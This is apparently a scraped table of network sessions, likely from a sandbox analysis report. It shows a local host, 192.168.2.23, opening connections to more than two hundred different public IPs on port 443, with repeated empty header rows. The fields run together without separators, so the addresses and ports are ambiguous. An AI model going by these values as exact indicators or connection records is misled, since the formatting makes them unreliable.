                                                22796192.168.2.2360144219.112.43.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22797192.168.2.2357258148.70.165.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22798192.168.2.2350264219.231.87.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22799192.168.2.2343724188.145.236.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22800192.168.2.2351552118.240.229.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22801192.168.2.2340950113.137.196.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22802192.168.2.235757482.40.185.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22803192.168.2.2360474155.240.130.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22804192.168.2.2345008154.167.37.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22805192.168.2.234201288.121.28.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22806192.168.2.2333844121.128.50.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22807192.168.2.2344366208.165.122.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22808192.168.2.233491647.50.66.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22809192.168.2.234767082.131.55.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22810192.168.2.2354484139.190.134.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22811192.168.2.2348274106.167.30.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22812192.168.2.2335636102.174.207.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22813192.168.2.2342354149.64.248.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22814192.168.2.2334444134.201.188.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22815192.168.2.234568836.64.109.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22816192.168.2.235248425.12.135.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22817192.168.2.2352626170.74.172.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22818192.168.2.234321665.233.222.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22819192.168.2.2336388212.175.203.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22820192.168.2.2350300109.216.55.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22821192.168.2.235200488.16.67.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22822192.168.2.2336894198.80.213.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22823192.168.2.2344436119.187.255.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22824192.168.2.2346812177.241.154.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22825192.168.2.2353940190.31.139.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22826192.168.2.234102446.128.175.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22827192.168.2.233429835.162.220.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22828192.168.2.2336672105.114.107.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22829192.168.2.2340762143.182.21.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22830192.168.2.2347224184.75.48.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22831192.168.2.2348930165.169.56.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22832192.168.2.234303239.200.141.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22833192.168.2.235828299.215.247.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22834192.168.2.2348132130.120.161.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22835192.168.2.2344694217.210.163.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22836192.168.2.233454836.121.103.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22837192.168.2.2343648206.244.179.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22838192.168.2.2333528153.212.39.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22839192.168.2.233900064.186.161.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22840192.168.2.2355874156.62.29.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22841192.168.2.234468246.25.43.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22842192.168.2.2341984213.58.249.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22843192.168.2.234031695.175.19.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22844192.168.2.2350108150.102.93.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22845192.168.2.2343994152.11.244.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22846192.168.2.235788842.255.158.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22847192.168.2.2347410133.177.100.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22848192.168.2.2338956184.144.43.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22849192.168.2.235957278.47.114.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22850192.168.2.2346174194.74.50.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22851192.168.2.234231676.47.25.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22852192.168.2.2352628125.153.188.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22853192.168.2.2354872161.32.48.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22854192.168.2.2359992212.205.126.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22855192.168.2.236010862.246.106.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22856192.168.2.2343686116.4.120.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22857192.168.2.233706682.244.44.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22858192.168.2.2350306115.216.224.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22859192.168.2.235834674.150.201.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22860192.168.2.2339436117.111.16.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22861192.168.2.234364080.63.170.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22862192.168.2.2341282196.116.82.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22863192.168.2.2337986110.0.31.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22864192.168.2.235691895.1.62.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22865192.168.2.2345722150.42.26.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22866192.168.2.2334706140.82.5.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22867192.168.2.234593299.225.183.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22868192.168.2.2344010205.16.212.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22869192.168.2.2353804144.183.90.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22870192.168.2.235764441.56.174.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22871192.168.2.2360000102.17.107.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22872192.168.2.2353380182.149.82.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22873192.168.2.2339524132.199.181.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22874192.168.2.234332812.147.150.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22875192.168.2.234663823.90.81.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22876192.168.2.2353792186.100.153.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22877192.168.2.2358484168.82.213.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22878192.168.2.233634032.98.142.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22879192.168.2.235094452.32.176.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22880192.168.2.235060291.242.86.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22881192.168.2.233816867.121.185.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22882192.168.2.2350148210.138.42.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22883192.168.2.234794867.169.46.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22884192.168.2.235440083.219.191.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22885192.168.2.2337594191.6.194.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22886192.168.2.2346910178.37.211.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22887192.168.2.2356374140.0.115.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22888192.168.2.2358404171.213.217.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22889192.168.2.2338526115.75.196.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22890192.168.2.235224089.226.158.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22891192.168.2.234425673.37.22.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22892192.168.2.2341708207.24.15.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22893192.168.2.2340974147.34.71.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22894192.168.2.236075812.190.194.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22895192.168.2.2348154202.234.228.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22896192.168.2.2349976102.104.115.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22897192.168.2.236040883.178.248.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22898192.168.2.2359668102.56.72.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22899192.168.2.2333186135.22.36.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22900192.168.2.234740432.14.159.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22901192.168.2.2341962128.147.127.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22902192.168.2.2351762107.229.250.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22903192.168.2.2355576123.113.104.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22904192.168.2.234942659.29.8.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22905192.168.2.2339272152.222.35.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22906192.168.2.2347984195.81.210.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22907192.168.2.2348776199.62.253.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22908192.168.2.235631040.136.173.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22909192.168.2.2357376171.37.70.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22910192.168.2.2348498171.62.100.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22911192.168.2.235436612.5.181.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22912192.168.2.2360516126.156.236.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22913192.168.2.2343204179.67.248.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22914192.168.2.234833867.213.123.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22915192.168.2.234658880.172.26.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22916192.168.2.233692019.101.214.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22917192.168.2.234562065.41.231.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22918192.168.2.2352364179.79.189.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22919192.168.2.235383666.180.191.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22920192.168.2.2351764177.87.100.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22921192.168.2.2334186146.169.40.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22922192.168.2.2341706144.212.62.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22923192.168.2.233894299.228.79.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22924192.168.2.234869689.46.84.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22925192.168.2.2339134196.221.243.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22926192.168.2.2342470147.225.17.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22927192.168.2.236073451.11.112.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22928192.168.2.2354112175.237.79.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22929192.168.2.2354960202.100.236.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22930192.168.2.2338082138.144.21.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22931192.168.2.235445648.204.187.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22932192.168.2.2355620172.101.68.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22933192.168.2.234319696.188.23.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22934192.168.2.2351412199.240.70.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22935192.168.2.2348756143.178.200.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22936192.168.2.2341792138.21.175.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22937192.168.2.235167876.234.31.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22938192.168.2.2338106211.56.211.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22939192.168.2.2345406153.92.174.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22940192.168.2.2352860121.179.25.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22941192.168.2.233713236.19.238.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22942192.168.2.2358924160.198.122.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22943192.168.2.2344494126.252.133.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22944192.168.2.2342132107.17.97.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22945192.168.2.2342124207.137.224.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22946192.168.2.23520164.90.136.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22947192.168.2.23431181.84.9.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22948192.168.2.2340596192.137.25.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22949192.168.2.236013618.215.23.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22950192.168.2.2355834128.242.19.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22951192.168.2.2343074162.130.155.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22952192.168.2.2333064114.143.142.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22953192.168.2.2344684158.85.196.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22954192.168.2.235652459.27.245.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22955192.168.2.233544437.238.114.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22956192.168.2.233398448.85.154.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22957192.168.2.2359468210.53.115.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22958192.168.2.23408322.28.28.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22959192.168.2.2346652188.6.173.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22960192.168.2.233675896.143.98.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22961192.168.2.2339666194.103.73.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22962192.168.2.234698824.99.188.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22963192.168.2.23331121.255.124.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22964192.168.2.2336286148.51.127.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22965192.168.2.2359950147.242.5.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22966192.168.2.233380420.206.93.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22967192.168.2.235236443.219.241.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22968192.168.2.234036048.34.237.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22969192.168.2.2335650204.145.154.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22970192.168.2.236032079.176.90.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22971192.168.2.2342198209.191.65.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22972192.168.2.233775461.56.44.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22973192.168.2.2349826161.245.46.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22974192.168.2.234203095.40.207.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22975192.168.2.2351732186.160.53.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22976192.168.2.2343962151.26.154.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22977192.168.2.2353624170.2.199.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22978192.168.2.2333370185.43.146.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22979192.168.2.234192273.171.159.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22980192.168.2.2357110132.219.120.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22981192.168.2.2352826184.106.168.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22982192.168.2.2339504182.73.249.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22983192.168.2.234912859.124.38.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22984192.168.2.234368865.92.86.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22985192.168.2.2354684154.28.72.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22986192.168.2.2350484180.5.140.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22987192.168.2.2334748149.13.3.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22988192.168.2.233920051.197.34.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22989192.168.2.235776050.10.19.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22990192.168.2.2360058196.194.95.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22991192.168.2.2359428104.25.149.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22992192.168.2.23374109.62.186.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22993192.168.2.2347560194.34.2.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22994192.168.2.235525883.94.45.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22995192.168.2.2339766185.159.134.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22996192.168.2.2356160173.45.250.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22997192.168.2.233313481.182.199.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22998192.168.2.2347910138.249.219.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22999192.168.2.2341338124.65.167.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23000192.168.2.235671899.197.210.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23001192.168.2.233577077.91.163.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23002192.168.2.234379023.12.208.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23003192.168.2.2344780179.105.179.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23004192.168.2.235596836.84.7.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23005192.168.2.2337306178.167.11.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23006192.168.2.235393012.136.242.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23007192.168.2.235683237.253.163.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23008192.168.2.2344762198.240.248.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23009192.168.2.2340998115.65.131.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23010192.168.2.2347962195.190.72.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23011192.168.2.2357496191.244.133.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23012192.168.2.2346208173.251.204.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23013192.168.2.233481447.248.50.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23014192.168.2.2355284135.83.48.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23015192.168.2.234785418.186.29.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23016192.168.2.23478382.136.176.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23017192.168.2.2345590140.28.234.89443
                                                TimestampBytes transferredDirectionData


